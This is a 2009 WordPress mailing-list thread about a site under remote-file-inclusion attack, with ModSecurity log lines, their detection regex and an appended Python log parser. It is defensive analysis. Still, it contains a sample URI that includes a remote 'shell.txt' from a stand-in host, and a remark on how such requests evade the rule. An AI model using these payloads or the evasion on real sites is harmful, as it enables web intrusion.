[wp-testers] **Maybe OT** Hacking Problem In 2.7.1

Ibrahim A. Mohamed bingorabbit at gmail.com
Tue Apr 14 13:29:00 GMT 2009


Hello,

Can you please send us the content of .htaccess in the root directory of
your WordPress installation.

Also have you changed any of your files' permissions?

Is there any suspected activity in your website's traffic?

Thanks in Advance!

On Tue, Apr 14, 2009 at 2:29 PM, Paul Robinson <pablorobinson at gmail.com> wrote:

> Hi,
>
> I hope the title is descriptive enough & I think it's a little off topic so
> I've added that.
>
> Basically for the last 2 maybe 3 weeks I've had stability problems with my
> website. I assumed it was down to server problems & asked my host to check
> it out. Apparently there were no problems. Then the site just stopped working
> & only showed 500 errors. I downloaded the Apache error logs & found this:
>
> [Mon Apr 13 05:37:38 2009] [error] [client 217.199.222.19] ModSecurity: Access denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt to remote include command shell"] [severity "CRITICAL"] [hostname "return-true.com"] [uri "/hw3.php"] [unique_id "SeMyEkPNBIMAAFN2guwAAAAE"]
> [Mon Apr 13 05:37:38 2009] [error] [client 217.199.222.19] ModSecurity: Access denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt to remote include command shell"] [severity "CRITICAL"] [hostname "return-true.com"] [uri "/2009/03//hw3.php"] [unique_id "SeMyEkPNBIMAAEe1L5IAAAAF"]
> [Mon Apr 13 05:37:38 2009] [error] [client 217.199.222.19] ModSecurity: Access denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt to remote include command shell"] [severity "CRITICAL"] [hostname "return-true.com"] [uri "/2009/03/zstore-helper-wordpress-plugin-for-zazzle-store-builder//hw3.php"] [unique_id "SeMyEkPNBIMAAFLAg@sAAAAC"]
> [Mon Apr 13 05:51:33 2009] [error] [client 200.93.147.154] ModSecurity: Access denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt to remote include command shell"] [severity "CRITICAL"] [hostname "return-true.com"] [uri "/includes/header.php"] [unique_id "SeM1VUPNBIMAAGVMYQAAAAAJ"]
> [Mon Apr 13 05:51:33 2009] [error] [client 200.93.147.154] ModSecurity: Access denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt to remote include command shell"] [severity "CRITICAL"] [hostname "return-true.com"] [uri "/2009/04/php-tip-5-header//includes/header.php"] [unique_id "SeM1VUPNBIMAAHm84wEAAAAF"]
>
> Then after that all processes created by my site are cut by the shared
> server's memory-limiting script. The last two times this happened it took a
> reinstall of WordPress' files to fix it, but this last time I had to restore a
> backup of the database, which is taken regularly thank god. I have been told
> by my host that the attacks are always blocked but they seem to break
> WordPress somehow & that's what I'm hoping someone can help with. I realize
> it's a long shot, but I've got nothing to lose seeing as it's happening
> fairly often.
>
> I have beefed up security on WP a lot, I've changed the default db prefix,
> I've chmod'ed all folders to the recommended settings & I've placed
> .htaccess files in my admin & includes folders. Any other suggestions of
> what is happening or how to stop it would be great. Thanks
>
> Paul.
> _______________________________________________
> wp-testers mailing list
> wp-testers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-testers
>



-- 
Regards,
Ibrahim Abdel Fattah Mohamed
Web Developer
Twitter: @bingorabbit
e-mail: bingorabbit at gmail.com
Personal bLOG: http://bingorabbit.com/
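As an added example for this thread (not code from the list, the poster or WordPress): a small Python parser for ModSecurity 2.x error-log entries of the shape quoted above, plus a check that re-runs the rule's own regex against a request URI the way ModSecurity applied it to REQUEST_URI. The log lines in the block are constructed copies of the quoted entries; the request URIs and the host 203.0.113.5 used to exercise the rule are made up. Two things it makes visible: the [uri "..."] field in these entries carries no query string, so the remote URL that actually tripped rule 390144 is not in the error log, and the doubled slashes in "/2009/03//hw3.php" come from the scanner appending its target file name onto the blog's existing permalinks.

```python
"""Parse ModSecurity error-log entries and re-check URIs against the rule.

Added example for this thread, not code from the list, the poster or
WordPress. SAMPLE_LOG is constructed to mirror the quoted entries; the
URIs passed to would_block() and the host 203.0.113.5 are made up.
"""
import re
from collections import defaultdict

# Constructed sample: four entries with the same shape as the posted lines.
SAMPLE_LOG = r'''
[Mon Apr 13 05:37:38 2009] [error] [client 217.199.222.19] ModSecurity: Access denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt to remote include command shell"] [severity "CRITICAL"] [hostname "return-true.com"] [uri "/hw3.php"] [unique_id "SeMyEkPNBIMAAFN2guwAAAAE"]
[Mon Apr 13 05:37:38 2009] [error] [client 217.199.222.19] ModSecurity: Access denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt to remote include command shell"] [severity "CRITICAL"] [hostname "return-true.com"] [uri "/2009/03//hw3.php"] [unique_id "SeMyEkPNBIMAAEe1L5IAAAAF"]
[Mon Apr 13 05:51:33 2009] [error] [client 200.93.147.154] ModSecurity: Access denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt to remote include command shell"] [severity "CRITICAL"] [hostname "return-true.com"] [uri "/includes/header.php"] [unique_id "SeM1VUPNBIMAAGVMYQAAAAAJ"]
[Mon Apr 13 05:51:33 2009] [error] [client 200.93.147.154] ModSecurity: Access denied with code 503 (phase 2). Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\x20?\\?" at REQUEST_URI. [file "/dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf"] [line "23"] [id "390144"] [rev "2"] [msg "Command shell attack: Generic Attempt to remote include command shell"] [severity "CRITICAL"] [hostname "return-true.com"] [uri "/2009/04/php-tip-5-header//includes/header.php"] [unique_id "SeM1VUPNBIMAAHm84wEAAAAF"]
'''

# Fixed head of a pattern-match entry, then the trailing [key "value"] fields.
ENTRY_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<client>[^\]]+)\] ModSecurity: '
    r'(?P<action>.*?)\. Pattern match "(?P<pattern>[^"]*)" at (?P<target>[A-Z_:|]+)\. '
    r'(?P<fields>.*)$')
FIELD_RE = re.compile(r'\[(?P<key>[a-z_]+) "(?P<val>[^"]*)"\]')


def parse_entry(line):
    """Return a dict for one entry (ts, client, action, pattern, target, plus
    file/line/id/rev/msg/severity/hostname/uri/unique_id), or None."""
    m = ENTRY_RE.match(line)
    if not m:
        return None
    entry = {k: m.group(k) for k in ('ts', 'client', 'action', 'pattern', 'target')}
    for f in FIELD_RE.finditer(m.group('fields')):
        entry[f.group('key')] = f.group('val')
    return entry


def parse_log(text):
    return [e for e in (parse_entry(l) for l in text.strip().splitlines()) if e]


def rule_regex(logged_pattern):
    """The error log writes every backslash of the rule's regex doubled;
    undo that so the pattern compiles as ModSecurity evaluated it."""
    return re.compile(logged_pattern.replace('\\\\', '\\'))


def would_block(rx, request_uri):
    """True if a request line (path plus query string) trips the rule.
    ModSecurity's @rx is a search, not a full match, so use search()."""
    return rx.search(request_uri) is not None


def summarize(entries):
    """Hits, rule ids and uri fields per client IP."""
    by_client = defaultdict(lambda: {'hits': 0, 'rule_ids': set(), 'uris': []})
    for e in entries:
        s = by_client[e['client']]
        s['hits'] += 1
        s['rule_ids'].add(e['id'])
        s['uris'].append(e['uri'])
    return dict(by_client)


def doubled_slash_uris(entries):
    """uri values where a target file name was glued onto an existing
    permalink ("/2009/03//hw3.php"): handy for separating scan noise."""
    return [e['uri'] for e in entries if '//' in e['uri']]


if __name__ == '__main__':
    entries = parse_log(SAMPLE_LOG)
    for client, s in summarize(entries).items():
        print(client, s['hits'], sorted(s['rule_ids']), s['uris'])
    rx = rule_regex(entries[0]['pattern'])
    for uri in ('/hw3.php?inc=http://203.0.113.5/shell.txt?',   # made-up payload
                '/hw3.php',                                      # path only, as logged
                '/index.php?page=http://203.0.113.5/x.gif'):     # no trailing "?"
        print(would_block(rx, uri), uri)
```

Note what the last check shows: the rule ends in `\x20?\?`, so it only fires when the included URL carries a trailing `?` after one of the listed extensions (the usual trick for discarding whatever the script appends). A remote URL without that trailing `?` passes this particular rule, which is why a single CRITICAL hit in the error log should be read as "a scanner tried this" rather than as a complete record of what was attempted; the audit log, if enabled, holds the full request.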